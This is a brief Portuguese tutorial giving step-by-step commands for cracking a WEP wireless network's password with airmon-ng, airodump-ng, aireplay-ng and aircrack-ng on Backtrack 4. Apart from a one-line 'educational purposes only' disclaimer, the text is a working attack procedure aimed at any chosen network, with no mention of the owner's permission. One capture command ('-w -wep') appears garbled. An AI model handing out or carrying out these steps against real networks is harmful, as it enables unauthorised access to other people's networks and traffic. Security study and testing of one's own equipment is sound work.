Descobrir a password de uma rede wireless (Wep)

Bem, este é já um assunto bastante falado e pouco há para acrescentar. Escusado será dizer que este mini tutorial é para efeitos educacionais apenas.

Utilizei o Backtrack 4 numa pen drive com a ajuda do UNetbootin, já vem com todas as ferramentas possíveis e imaginárias instaladas e com os drivers correctos para a placa wireless.

Em primeiro lugar e necessário iniciar o serviço "NETWORK" no menu "Services".

Na consola escreve:

airmon-ng
airmon-ng start [Interface] (No meu caso seria wlan0)
airodump-ng mon0

Vão aparecer as redes wireless disponíveis, vamos precisar de apontar o BSSID e o CH da rede que pretendemos e depois premir "Ctrl+C" para parar o processo.

Na consola novamente:

airodump-ng -w -wep -c [CH] --bssid [BSSID] mon0

Deixando a consola anterior a correr, numa nova consola:

aireplay-ng -1 0 -a [BSSID] mon0

Deixando a consola anterior a correr, novamente numa nova consola:

aireplay-ng -3 -b [BSSID] mon0

Voltando à primeira consola é necessário esperar que a na coluna da "#Data" chegue a um valor superior que 30 000 e só depois fechar o processo da terceira consola pressionando com "Ctrl+C".

Nesta mesma consola (a terceira que utilizamos neste tutorial) escrevemos:

dir
aircrack-ng [wep-**.cap] (No meu caso seria wep-01.cap visto de se tratar da primeira tentativa)

Se tudo correu bem deverá aparecer a password da rede wireless.